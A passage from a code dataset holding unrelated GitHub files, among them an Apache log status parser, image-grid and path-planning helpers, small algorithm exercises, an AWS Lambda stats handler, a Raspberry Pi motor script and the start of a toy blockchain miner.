[],\n 'unauthorized': [],\n }\n with open(logfile, \"r\") as f:\n for line in f:\n parts = line.split(\" \")\n ip = parts[0]\n date = parts[3]\n method = parts[5]\n path = parts[6]\n status = parts[8]\n if status.startswith(\"5\"):\n threats[\"fatal_error\"].append({\n \"ip\": ip,\n \"date\": date,\n \"method\": method,\n \"path\": path,\n \"status\": status\n })\n elif status == \"404\":\n threats[\"not_found\"].append({\n \"ip\": ip,\n \"date\": date,\n \"method\": method,\n \"path\": path,\n \"status\": status\n })\n elif status.startswith(\"4\"):\n threats[\"unauthorized\"].append({\n \"ip\": ip,\n \"date\": date,\n \"method\": method,\n \"path\": path,\n \"status\": status\n })\n self.__threats = threats\n if len(threats) > 0 and self._debug_level == DEBUG_LEVEL.INFO:\n print(\"Found \" + str(len(threats)) + \" threats in Apache log file: \" + logfile) \n for type_of_threat in threats:\n print(\"Type of threat: \" + type_of_threat)\n if len(threats[type_of_threat]) == 0:\n print(\"* No threats found\")\n for threat in threats[type_of_threat]:\n print(\"IP: \" + threat[\"ip\"])\n print(\"Date: \" + threat[\"date\"])\n print(\"Method: \" + threat[\"method\"])\n print(\"Path: \" + threat[\"path\"])\n print(\"Status: \" + threat[\"status\"])\n print()\n \n def export(self):\n if self._output_format == OUTPUT_FORMAT.JSON:\n return json.dumps(self.__threats)\n return self.__threats","repo_name":"mxnu/master_tool","sub_path":"modules/apache.py","file_name":"apache.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34225491493","text":"import tensorflow as tf\nfrom tensorflow.contrib.slim.nets import vgg\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.ops import random_ops\nfrom tensorflow.python.framework.ops import convert_to_tensor\n\n\nif __name__ == '__main__':\n batch_size = 1\n height, width = 224, 224\n with tf.Session() as sess:\n # inputs = random_ops.random_uniform((batch_size, height, width, 3))\n image = tf.image.decode_jpeg(tf.read_file('Aoba.jpg'))\n image_tensor = image.eval()\n image_tensor = tf.expand_dims(image_tensor, 0)\n image_tensor = tf.to_float(image_tensor)\n\n logits, end_points = vgg.vgg_19(image_tensor)\n sess.run(variables.global_variables_initializer())\n output = sess.run(end_points['vgg_19/pool5'])\n print(output.shape)\n\n","repo_name":"remorsecs/TF-Slim-Example","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38407314375","text":"#!/usr/bin/env python2\nimport cv2\nimport numpy as np\n\nclass gridmaker:\n def __init__(self,s,frame):\n self.s=s\n self.img = frame\n #self.img=cv2.imread(\"/home/benlee/catkin_ws/src/find_path/script/A_star_diff/frame.jpg\",0) #bring image\n self.h,self.w=self.img.shape #get image size h = height, w = width\n self.grid=np.zeros(shape=(26,32)) #make blank zero numpy \n\n def iswhite(self,a,b,block): # a = w, b = h, block = img \n h,w=block.shape\n count=0\n for i in range(b,b+20):\n for j in range(a,a+20):\n if(i<480 and j<640):\n if(block[i][j]>0): # >0 = 1 , means there is obstacle!!\n count=count+1\n #print(\"count\", count) \n if(count>225):\n return True\n return False\n\n\n def returnGrid(self):\n for i in range(0,self.w,self.s):\n for j in range(0,self.h,self.s):\n if(self.iswhite(i,j,self.img)):\n self.grid[int(j/self.s)][int(i/self.s)]=1\n #print(self.grid[int(j/self.s)][int(i/self.s)])\n #cv2.rectangle(frame,(i,j),(i+self.s,j+self.s),(255,0,0),-1)\n #else:\n #cv2.rectangle(frame,(i,j),(i+self.s,j+self.s),(255,0,0),1)\n\n return self.grid\n\nclass Basic_map:\n def __init__(self):\n self.Color_HSV = {}\n self.Color_HSV['RED'] = [126, 134, 0, 255, 255, 255]\n self.Color_HSV['YELLOW'] = [0, 65, 60, 40, 152, 255]\n self.Color_HSV['GREEN'] = [59, 61, 60, 100, 255, 255]\n\n self.x = 0\n self.y = 0\n return\n def Gmask_for_start_end(self,img,color):\n lowerBound = np.array(self.Color_HSV[color][:3])\n upperBound = np.array(self.Color_HSV[color][3:6])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n color_mask = cv2.inRange(hsv, lowerBound, upperBound)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n erosion = cv2.erode(color_mask, kernel,iterations =1)\n dilation = cv2.dilate(erosion, kernel, iterations=3)\n return dilation\n\n def find(self,img, color): #find specific color points, in this case start, end_nodes\n lowerBound = np.array(self.Color_HSV[color][:3])\n upperBound = np.array(self.Color_HSV[color][3:6])\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n color_mask = cv2.inRange(hsv, lowerBound, upperBound)\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\n erosion = cv2.erode(color_mask, kernel,iterations =1)\n dilation = cv2.dilate(erosion, kernel, iterations=3)\n # frame=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n # th,frame=cv2.threshold(frame,127,255,cv2.THRESH_BINARY)\n _, contours, _ = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n if len(contours) > 0:\n for i in range(len(contours)):\n # Get area value\n area = cv2.contourArea(contours[i])\n print(\"area\",area)\n if area > 0: # minimum area\n rect = cv2.minAreaRect(contours[i])\n (self.x, self.y), (w, h), angle = cv2.minAreaRect(contours[i])\n box = cv2.boxPoints(rect)\n box = np.int0(box)\n #cv2.drawContours(img, [box], 0, (0, 0, 255), 2)\n return True, round(self.x), round(self.y), w, h,dilation\n else:\n return False, 0, 0, 0, 0, dilation\n else:\n return False, 0, 0, 0, 0, dilation\n\n def obstacle_load(self,img): # make base_map that has obstacle pixel data\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n ret, base_map = cv2.threshold(img_gray, 72, 255, 1)\n return base_map\n\n\ndef capture(ros_data):\n np_arr = np.fromstring(ros_data.data, np.uint8)\n image_np = cv2.imdecode(np_arr, cv2.IMREAD_COLOR)\n frame = image_np\n # cv2.imwrite('frmae.jpg', frame)\n # cv2.waitKey(1) & 0xFF\n return frame\n\ndef interrupt_detection(captured, current, path):\n count = 0\n for (first, last) in path:\n for i in range(0,3):\n #### Difference between Captured vs. Current Frame \n if captured[first][last][i]!=current[first][last][i]:\n count = count + 1\n else:\n count = count\n if count >= 18:\n return 1\n else:\n return 0","repo_name":"benthebear93/capstone_pathplanning","sub_path":"capstone/scripts/A_star_diff/Img_process_gird.py","file_name":"Img_process_gird.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"1424933356","text":"# G4 16120 PPAP\n# https://www.acmicpc.net/problem/16120\n# 자료 구조, 그리디 알고리즘, 스택\nimport sys\ninput = sys.stdin.readline\n\nlst = input().rstrip()\n\nstack = []\nppap = ['P','P','A','P']\nif lst == ppap or lst == ['P']:\n print('PPAP')\nelse:\n for i in lst:\n stack.append(i)\n if stack[-4:] == ppap:\n stack.pop()\n stack.pop()\n stack.pop()\n\nif stack == ppap or stack == ['P']:\n print('PPAP')\nelse:\n print('NP')\n\n# 시간초과\n# while lst.find('PPAP')>=0:\n# cnt = lst.count('PPAP')\n# lst = lst.replace('PPAP', 'P', cnt)\n# if lst=='P':\n# print('PPAP')\n# else:\n# print('NP')","repo_name":"hhongjj/Algorithm","sub_path":"BOJ/3.GOLD/G4_16120_PPAP.py","file_name":"G4_16120_PPAP.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41239093609","text":"import csv\nimport sys\n\n\ndef main():\n\n # TODO: Check for command-line usage\n if len(sys.argv) != 3:\n sys.exit(\"Usage: python dna.py data.csv sequence.txt\")\n\n csv_file_name = sys.argv[1]\n dna_file_name = sys.argv[2]\n\n # TODO: Read database file into a variable\n # TODO: Read DNA sequence file into a variable\n with open(csv_file_name, \"r\") as csv_file, open(dna_file_name, \"r\") as dna_file:\n csv_reader = csv.reader(csv_file)\n\n # Store header of CSV file in a string\n header = next(csv_file).rstrip()\n # Store STRs as a string by removing the first five letters from the\n # header string, e.g. \"Name,\"\n strs_as_string = header[5:]\n # Store STRs in a list\n strs = strs_as_string.split(',')\n\n # Store DNA sequence in a string by reading the DNA file\n dna = dna_file.read().rstrip()\n\n # A dictionary to store longest matches for each STR\n # E.g. the key is the STR and the corresponding value is the longest match\n # of that specific STR found in the DNA file.\n longest_matches = {}\n\n # TODO: Find longest match of each STR in DNA sequence\n for str in strs:\n longest_matches[str] = longest_match(dna, str)\n\n # TODO: Check database for matching profiles\n individual_is_found = False\n correct_individual = \"No match\"\n\n for individual in csv_reader:\n individual_is_potentially_a_match = True\n\n if individual_is_found:\n break\n else:\n for i in range(len(strs)):\n if longest_matches[strs[i]] != int(individual[i + 1]):\n individual_is_potentially_a_match = False\n break\n if individual_is_potentially_a_match:\n individual_is_found = True\n correct_individual = individual[0]\n break\n\n print(correct_individual)\n\n return\n\n\ndef longest_match(sequence, subsequence):\n \"\"\"Returns length of longest run of subsequence in sequence.\"\"\"\n\n # Initialize variables\n longest_run = 0\n subsequence_length = len(subsequence)\n sequence_length = len(sequence)\n\n # Check each character in sequence for most consecutive runs of subsequence\n for i in range(sequence_length):\n\n # Initialize count of consecutive runs\n count = 0\n\n # Check for a subsequence match in a \"substring\" (a subset of characters) within sequence\n # If a match, move substring to next potential match in sequence\n # Continue moving substring and checking for matches until out of consecutive matches\n while True:\n\n # Adjust substring start and end\n start = i + count * subsequence_length\n end = start + subsequence_length\n\n # If there is a match in the substring\n if sequence[start:end] == subsequence:\n count += 1\n\n # If there is no match in the substring\n else:\n break\n\n # Update most consecutive matches found\n longest_run = max(longest_run, count)\n\n # After checking for runs at each character in seqeuence, return longest run found\n return longest_run\n\n\nmain()","repo_name":"s-palgo/cs50","sub_path":"week6/pset6/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27996723859","text":"import datetime\nimport json\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Optional, Dict, Any\n\nimport aws_embedded_metrics\nimport boto3\nimport botocore.client\nfrom aws_embedded_metrics.logger.metrics_logger import MetricsLogger\n\nSTATIC_HEADERS = {\n \"Content-Type\": \"text/plain; charset=utf-8\",\n \"Cache-Control\": \"no-cache\",\n \"Access-Control-Allow-Origin\": \"*\",\n}\n\nRECORD_KEY = \"Records\"\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\n@aws_embedded_metrics.metric_scope\ndef lambda_handler(event, context, metrics):\n metrics.set_namespace(\"CompilerExplorer\")\n logger.info(\"Received new lambda event %s\", event)\n if RECORD_KEY in event:\n return handle_sqs(event, context)\n return handle_http(event, metrics)\n\n\ndef handle_sqs(\n event: Dict,\n context,\n s3_client: Optional[botocore.client.BaseClient] = None,\n now: Optional[datetime.datetime] = None,\n):\n s3_client = s3_client or boto3.client(\"s3\")\n now = now or datetime.datetime.utcnow()\n\n logger.info(\"Handling %d messages\", len(event[RECORD_KEY]))\n key = f\"stats/{context.function_name}-{now.strftime('%Y-%m-%d-%H:%M:%S.%f')}.log\"\n body = \"\\n\".join(r[\"body\"] for r in event[RECORD_KEY])\n bucket_name = os.environ[\"S3_BUCKET_NAME\"]\n logger.info(\"writing to %s with key %s\", bucket_name, key)\n s3_client.put_object(Bucket=bucket_name, Body=body, Key=key)\n\n\ndef handle_http(\n event: Dict,\n metrics: MetricsLogger,\n sqs_client: Optional[botocore.client.BaseClient] = None,\n dynamo_client: Optional[botocore.client.BaseClient] = None,\n now: Optional[datetime.datetime] = None,\n):\n sqs_client = sqs_client or boto3.client(\"sqs\")\n dynamo_client = dynamo_client or boto3.client(\"dynamodb\")\n now = now or datetime.datetime.utcnow()\n\n path = event[\"path\"].split(\"/\")[1:]\n method = event[\"httpMethod\"]\n if path == [\"pageload\"] and method == \"POST\":\n return handle_pageload(event, metrics, now, os.environ[\"SQS_STATS_QUEUE\"], sqs_client)\n\n if len(path) == 2 and path[0] == \"compiler-build\" and method == \"GET\":\n return handle_compiler_stats(path[1], os.environ[\"COMPILER_BUILD_TABLE\"], dynamo_client)\n\n return dict(\n statusCode=404,\n statusDescription=\"404 Not Found\",\n isBase64Encoded=False,\n headers=STATIC_HEADERS,\n body=\"Not found\",\n )\n\n\ndef handle_pageload(\n event: Dict, metrics: MetricsLogger, now: datetime.datetime, queue_url: str, sqs_client: botocore.client.BaseClient\n):\n date = now.strftime(\"%Y-%m-%d\")\n time = now.strftime(\"%H:%M:%S\")\n sqs_client.send_message(\n QueueUrl=queue_url,\n MessageBody=json.dumps(dict(type=\"PageLoad\", date=date, time=time, value=\"\"), sort_keys=True),\n )\n icons = urllib.parse.unquote_plus(event[\"queryStringParameters\"].get(\"icons\", \"\"))\n sponsors = list(filter(lambda x: x, icons.split(\",\")))\n for sponsor in sponsors:\n sqs_client.send_message(\n QueueUrl=queue_url,\n MessageBody=json.dumps(dict(type=\"SponsorView\", date=date, time=time, value=sponsor), sort_keys=True),\n )\n metrics.set_property(\"sponsors\", sponsors)\n metrics.put_metric(\"PageLoad\", 1)\n\n return dict(statusCode=200, statusDescription=\"200 OK\", isBase64Encoded=False, headers=STATIC_HEADERS, body=\"Ok\")\n\n\n# Example query from the UI\n# {\"TableName\":\"compiler-builds\",\"ReturnConsumedCapacity\":\n# \"TOTAL\",\"Limit\":50,\"KeyConditionExpression\":\"#kn0 = :kv0\",\n# \"ScanIndexForward\":false,\"FilterExpression\":\"#n0 = :v0\",\n# \"ExpressionAttributeNames\":{\"#n0\":\"status\",\"#kn0\":\"compiler\"},\n# \"ExpressionAttributeValues\":{\":v0\":{\"S\":\"OK\"},\":kv0\":{\"S\":\"gcc\"}}}\n\n\ndef _do_one_query(\n compiler: str, table: str, dynamo_client: botocore.client.BaseClient, status: Optional[str]\n) -> Optional[Dict]:\n params: Dict[str, Any] = dict(\n TableName=table,\n Limit=100, # NB limit to _evaluate_ not the limit of matches\n ScanIndexForward=False, # items in reverse order (by time)\n KeyConditionExpression=\"#key = :compiler\",\n ExpressionAttributeNames={\"#key\": \"compiler\"},\n ExpressionAttributeValues={\":compiler\": dict(S=compiler)},\n )\n if status is not None:\n params[\"FilterExpression\"] = \"#status = :status_filter\"\n params[\"ExpressionAttributeNames\"][\"#status\"] = \"status\"\n params[\"ExpressionAttributeValues\"][\":status_filter\"] = dict(S=status or \"na\")\n\n query_results = dynamo_client.query(**params)\n if query_results[\"Count\"]:\n most_recent = query_results[\"Items\"][0]\n return dict(\n path=most_recent[\"path\"][\"S\"],\n github_run_id=most_recent[\"github_run_id\"][\"S\"],\n timestamp=most_recent[\"timestamp\"][\"S\"],\n duration=int(most_recent[\"duration\"][\"N\"]),\n )\n return None\n\n\ndef handle_compiler_stats(compiler: str, table: str, dynamo_client: botocore.client.BaseClient) -> Dict:\n result = dict(\n last_success=_do_one_query(compiler, table, dynamo_client, \"OK\"),\n last_build=_do_one_query(compiler, table, dynamo_client, None),\n )\n return dict(\n statusCode=200,\n statusDescription=\"200 OK\",\n isBase64Encoded=False,\n headers={\n \"Content-Type\": \"application/json; charset=utf-8\",\n \"Cache-Control\": \"max-age: 180, must-revalidate\",\n \"Access-Control-Allow-Origin\": \"*\",\n },\n body=json.dumps(result),\n )\n","repo_name":"compiler-explorer/infra","sub_path":"lambda/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","stars":304,"dataset":"github-code","pt":"16"} +{"seq_id":"70797709768","text":"\"\"\"append_illum_cols - Append columns corresponding to illumination functions to a LoadData .csv\n\n\"\"\"\nimport argparse\nimport csv\nimport os\nimport shutil\nimport tempfile\nfrom os import PathLike\nfrom typing import Union, Any\nimport yaml\n\n\ndef check_file_arg(arg: Union[bytes, str, PathLike]) -> Union[bytes, str, PathLike]:\n \"\"\"Make sure the argument is a path to a file\"\"\"\n if not os.path.isfile(arg):\n raise argparse.ArgumentTypeError(\n \"%s is not a path to an existing file\" % arg)\n return arg\n\n\ndef check_dir_arg(arg: Union[bytes, str, PathLike]) -> Union[bytes, str, PathLike]:\n \"\"\"Make sure the argument is a path to an existing directory\"\"\"\n if not os.path.isdir(arg):\n raise argparse.ArgumentTypeError(\n \"%s is not a path to an existing directory\" % arg)\n return arg\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Append columns corresponding to illumination \"\n \"functions to a LoadData .csv\")\n\n parser.add_argument(\"--plate-id\",\n dest=\"plate_id\",\n help=\"Plate ID\")\n\n parser.add_argument(\n \"--illum-directory\", type=check_dir_arg,\n dest=\"illum_directory\",\n help=\"The directory containing the illumination functions\")\n\n parser.add_argument(\n \"config_file\", type=check_file_arg,\n help=\"The config.yaml file that chooses channels and\"\n \" metadata for the CSV\")\n\n parser.add_argument(\n \"--illum_filetype\", default='.npy', dest='illum_filetype',\n help=\"The file type of the illum files- in CP2.X, this should be '.mat', in CP3.X '.npy'\")\n\n parser.add_argument(\n \"input_csv\", type=check_file_arg,\n help=\"The name of the LoadData .csv file to be manipulated\")\n\n parser.add_argument(\n \"output_csv\",\n help=\"The name of the LoadData .csv file to be created after appending\")\n\n return parser.parse_args()\n\n\ndef load_config(config_file: Union[bytes, str, PathLike]) -> (Any, Any):\n \"\"\"Load the configuration from config.yaml\"\"\"\n with open(config_file, \"r\") as fd:\n config = yaml.load(fd, Loader=yaml.BaseLoader)\n\n # if isinstance(config, list):\n # config = config[0]\n\n channels = config['channels']\n\n return channels\n\n\ndef main():\n\n options = parse_args()\n channels = load_config(options.config_file)\n nrows = sum(1 for _ in open(options.input_csv)) - 1\n\n tmpdir = tempfile.mkdtemp()\n\n with open(os.path.join(tmpdir, 'illum.csv'), 'w') as fd:\n writer = csv.writer(fd, lineterminator='\\n')\n\n write_csv(writer, channels, options.illum_directory, options.plate_id, nrows, options.illum_filetype)\n\n\n\n os.system('paste -d \",\" {} {} > {}'.format(options.input_csv,\n os.path.join(tmpdir, 'illum.csv'),\n options.output_csv\n ))\n\n\n shutil.rmtree(tmpdir)\n\n\ndef write_csv(writer, channels, illum_directory, plate_id, nrows, illum_filetype, sub_string_out='', sub_string_in=''):\n header = sum(\n [[\"_Illum\".join((prefix, channel.replace(\"Orig\", \"\"))) for prefix in [\"FileName\", \"PathName\"]] for channel in\n sorted(channels.values())], [])\n\n writer.writerow(header)\n\n row = sum([[plate_id + '_Illum' + channel.replace(\"Orig\", \"\") + illum_filetype, illum_directory] for\n channel in sorted(channels.values())], [])\n if sub_string_in != '' and sub_string_out != '':\n row = [x.replace(sub_string_out,sub_string_in) for x in row]\n writer.writerows([row] * nrows)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"broadinstitute/pe2loaddata","sub_path":"src/pe2loaddata/append_illum_cols.py","file_name":"append_illum_cols.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42708791254","text":"from pyspark import keyword_only\nfrom pyspark.ml import Transformer\nfrom pyspark.ml.param.shared import HasInputCol, HasOutputCol, Param, Params, TypeConverters\nfrom pyspark.ml.util import DefaultParamsReadable, DefaultParamsWritable\nfrom pyspark.sql.types import DoubleType\nimport pyspark.sql.functions as F\nimport math\n\n\nclass DateTransformer(Transformer, HasInputCol, HasOutputCol, DefaultParamsReadable, DefaultParamsWritable):\n input_col = Param(Params._dummy(), \"input_col\", \"input column name.\", typeConverter=TypeConverters.toString)\n \n @keyword_only\n def __init__(self, input_col=\"input\"):\n super(DateTransformer, self).__init__()\n self._setDefault(input_col=None)\n kwargs = self._input_kwargs\n self.set_params(**kwargs)\n \n @keyword_only\n def set_params(self, input_col=\"input\"):\n kwargs = self._input_kwargs\n self._set(**kwargs)\n \n def get_input_col(self):\n return self.getOrDefault(self.input_col)\n \n def _transform(self, df):\n input_col = self.get_input_col()\n \n month_cos_udf = F.udf(lambda month: math.cos(2*math.pi*float(month)/12.0) if month is not None else None, DoubleType())\n month_sin_udf = F.udf(lambda month: math.sin(2*math.pi*float(month)/12.0) if month is not None else None, DoubleType())\n \n # Extract month and year components\n df = df.withColumn(\"month\", F.month(input_col))\n df = df.withColumn(input_col + '_year', F.year(input_col))\n \n # Convert month to vector\n df = df.withColumn(input_col + '_month_cos', month_cos_udf(F.col(\"month\")))\n df = df.withColumn(input_col + '_month_sin', month_sin_udf(F.col(\"month\")))\n \n # Drop intermediate columns\n df = df.drop(\"month\", input_col)\n \n return df","repo_name":"kilimanj4r0/IBD","sub_path":"scripts/date_transformer.py","file_name":"date_transformer.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26602927348","text":"n = int(input())\nfigurinhas = []\nrepetidas = []\nvalores = []\n\nfor i in range(n):\n x = int(input())\n figurinhas.append(x)\n\nfor figurinha in figurinhas:\n if figurinha not in valores:\n valores.append(figurinha)\n else:\n repetidas.append(figurinha)\n\nprint(len(valores))\nprint(len(repetidas))\n","repo_name":"EdilsonJr/Uri-Judge-Python","sub_path":"ad-hoc/3129.py","file_name":"3129.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"15053089550","text":"from tech_news.database import search_news\nfrom datetime import datetime\n\n\ndef search_by_title(title: str):\n news = search_news({\n \"title\": {\"$regex\": title, \"$options\": \"i\"},\n })\n\n return [\n (info[\"title\"], info[\"url\"])\n for info in news\n ]\n\n\ndef search_by_date(date):\n try:\n get_date = datetime.strptime(date, \"%Y-%m-%d\")\n date_format = datetime.strftime(get_date, \"%d/%m/%Y\")\n\n news = search_news({\"timestamp\": date_format})\n\n return [\n (info[\"title\"], info[\"url\"])\n for info in news\n ]\n\n except ValueError:\n raise ValueError('Data inválida')\n\n\ndef search_by_category(category):\n news = search_news({\n \"category\": {\"$regex\": category, \"$options\": \"i\"},\n })\n\n return [\n (info[\"title\"], info[\"url\"])\n for info in news\n ]\n","repo_name":"yuryss98/project-tech-news","sub_path":"tech_news/analyzer/search_engine.py","file_name":"search_engine.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43918669862","text":"def df(node, graph):\n visited = set()\n longest_path = 0\n def d(node, graph):\n nonlocal visited, longest_path\n pass\ndef get_with_one_child(graph):\n ks = []\n for key, values in graph.items():\n if len(values) == 1:\n ks.append(key)\n return ks\n\ndef get_with_three_child_or_more(graph):\n ks = []\n for key, values in graph.items():\n if len(values) >= 3:\n ks.append(key)\n return ks\n\n\n\ngoing_to_win = True\n\nn = int(input())\ngraph = {}\nfor i in range(n+1):\n graph[i] = []\n\nfor _ in range(n-1):\n a, b = [int(p) for p in input().split()]\n graph[a].append(b)\n graph[b].append(a)\n\none = get_with_one_child(graph)\nthree = get_with_three_child_or_more(graph)\nimport random\nwhile three:\n first_child = graph[three[0]][random.randint(0, len(graph[three[0]]))]\n idx = 0\n while first_child == one[0]:\n idx += 1\n first_child = graph[three[0]][idx]\n graph[three[0]].remove(first_child)\n graph[first_child].remove(three[0])\n\n graph[one[0]].append(three[0])\n graph[three[0]].append(one[0])\n # three[0]\n # one[0]\n three = get_with_three_child_or_more(graph)\n one = get_with_one_child(graph)\nprint(graph)\n","repo_name":"stanislavkozlovski/python_exercises","sub_path":"hackerrank/hourrank_19/third.py","file_name":"third.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"4106489634","text":"\"\"\"Single window to display slideshow of images\"\"\"\n\n\nimport tkinter as tk\n\n\nclass SlideShow():\n \"\"\"Class to represent the slideshow window\"\"\"\n\n def __init__(self, title, start_callback, width=400, height=400):\n \"\"\"Initialise window and elements\"\"\"\n self.active = False\n\n self.start_callback = start_callback\n\n self.root = tk.Tk()\n self.root.title(title)\n\n self.root.geometry(\"%dx%d+%d+%d\" % (width, height, 0, 0))\n\n self.progress_label = tk.Label(\n self.root,\n text=\"Click 'Start' to begin\")\n self.progress_label.pack(side='top', fill='both', expand='no')\n\n self.panel = tk.Label(self.root)\n self.panel.pack(side='top', fill='both', expand='yes')\n\n self.startstop_button = tk.Button(\n self.panel,\n text='Start',\n command=self.toggle_start)\n self.startstop_button.pack(side='bottom')\n\n def show(self):\n \"\"\"Show the main window and enter the main loop\"\"\"\n self.root.mainloop()\n\n def toggle_start(self):\n \"\"\"Start/Stop the slideshow\"\"\"\n self.active = not self.active\n if self.active:\n self.startstop_button.config(text=\"Stop\")\n self.start_callback()\n else:\n self.startstop_button.config(text=\"Start\")\n\n def is_active(self):\n \"\"\"Is the slideshow active?\"\"\"\n return self.active\n\n def update_progress(self, index, max_items, message):\n \"\"\"Update the progress label with some stats\"\"\"\n progress = (index / max_items)\n label = \"{:d} ({:.2%}): {:s}\".format(index, progress, message)\n self.progress_label.config(text=label)\n","repo_name":"tobyoxborrow/chefcodes","sub_path":"slideshow.py","file_name":"slideshow.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"332594480","text":"import RPi.GPIO as GPIO\r\nimport time\r\n\r\n#['BCM', 'BOARD', 'BOTH', 'FALLING', 'HARD_PWM', 'HIGH', 'I2C', 'IN', 'LOW',\r\n#'OUT', 'PUD_DOWN', 'PUD_OFF', 'PUD_UP', 'PWM', 'RISING', 'RPI_INFO', 'RPI_REVISION',\r\n#'SERIAL', 'SPI', 'UNKNOWN', 'VERSION', '__builtins__', '__doc__', '__file__', '__name__',\r\n#'__package__', '__path__', 'add_event_callback', 'add_event_detect', 'cleanup',\r\n#'event_detected', 'getmode', 'gpio_function', 'input', 'output',\r\n#'remove_event_detect', 'setmode', 'setup', 'setwarnings', 'wait_for_edge']\r\n\r\nleadScrewPWMChannel = 9\r\n\r\n# Pin numbers are set according to Pi configuration.\r\npwmPin = 12\r\ndirPin = 11\r\n\r\n\r\nGPIO.setmode(GPIO.BOARD)\r\n\r\nGPIO.setup(dirPin, GPIO.OUT)\r\nGPIO.setup(pwmPin, GPIO.OUT)\r\n\r\n# Initialize PWM frequency to 400 Hz (pulses per second).\r\npwm = GPIO.PWM(pwmPin, 400)\r\n\r\nrodCarriageStepsPerMM = 3.33\r\nrodCarriageStepsPerRev = 200\r\n\r\nleadScrewStepsPerRev = 200\r\n\r\ndef mm2Steps(mm):\r\n return rodCarriageStepsPerMM*mm\r\n\r\ndef speed2Freq(rpm):\r\n return rodCarraigeStepsPerRev * rpm / 60\r\n\r\n# Set direction of motor\r\nGPIO.output(dirPin, GPIO.HIGH)\r\n\r\n# Set PWM pulse width. This determines the speed of the motor\r\ndist = 100; # Move 100mm\r\nsteps = mm2Steps(dist)\r\npwm.start(50)\r\n\r\nwhile True:\r\n time.sleep(2)\r\n GPIO.output(dirPin, GPIO.HIGH)\r\n time.sleep(2)\r\n GPIO.output(dirPin, GPIO.LOW)\r\n\r\nGPIO.cleanup()\r\n\r\n\r\n\r\n# test commit\r\n","repo_name":"rwychung/autocompleat","sub_path":"test/driveMotor.py","file_name":"driveMotor.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17297655049","text":"import socket\nimport hashlib\n#import flask nono need\nimport threading\nimport time\nfrom p2pnetwork import node\nimport math\n\n\nglobal user_id\nglobal globalBlockchain\nglobal canStartMining\nglobal options\nglobal otherIps\nglobal p2pnode\notherIps = []\n\n\n\ncanStartMining = 0\n\nuser_id = 1\nglobalBlockchain = []\ngenesisHash = \"6e31633822177790dd38702db12495af223e72b684ab5950bc4cde10\"\n\nnonce = 0\n\n# not using this because its a webapp now\n#debug = int(input(\"Should debug mode be on? (0 or 1)\\n\"))\ndebug = 0\n#init sha3_224\ns = hashlib.sha3_224()\nif(debug == 1):\n\n print(s.name + \" algorithm initialized\")\n\n #sha3_224 digest size\n print(\"digest size: \" + str(s.digest_size))\n\n #test genesis hash\n s.update(b\"Sat, Dec 18, 2021\")\n print(\"test genesis hash: \")\n print(s.hexdigest())\n print(\"expected hash:\")\n print(genesisHash)\n if(s.hexdigest() == genesisHash):\n print(\"hash is ok! proceeding.\")\n else:\n print(\"hash was incorrect!\")\n quit(1)\n \n testTransaction1 = {\n \"startUser\": \"server\",\n \"endUser\": \"u2\",\n \"amount\": \"10\"\n }\n testTransaction2 = {\n \"startUser\": \"u2\",\n \"endUser\": \"u1\",\n \"amount\": \"20\"\n }\n \n nonce = 0\n foundHash = 0\n while foundHash == 0:\n nonce += 1\n testBlock = []\n testBlock.append(nonce)\n testBlock.append(genesisHash)\n testBlock.append(testTransaction1)\n testBlock.append(testTransaction2)\n s.update(bytes(str(testBlock), \"utf-8\"))\n hash = s.hexdigest()\n if(hash[:5] == \"00000\"):\n testBlock.append(hash)\n foundHash = 1\n print(\"testBlock: \" + str(testBlock))\n print(\"nonce for testBlock: \" + str(nonce))\n print(\"hash of testBlock: \" + hash)\n print(\"DEBUG OVER, PROCEEDING TO MAIN APP\")\n print(\"\\n\")\n\n#actually do stuff\nprint(\"Quantonium v0.1\")\n\nglobal t1\nglobal t2\nglobal t3\ndef blockchainMinerLoop():\n global canStartMining\n global globalBlockchain\n\n genesisBlock = [\"-1\", \n 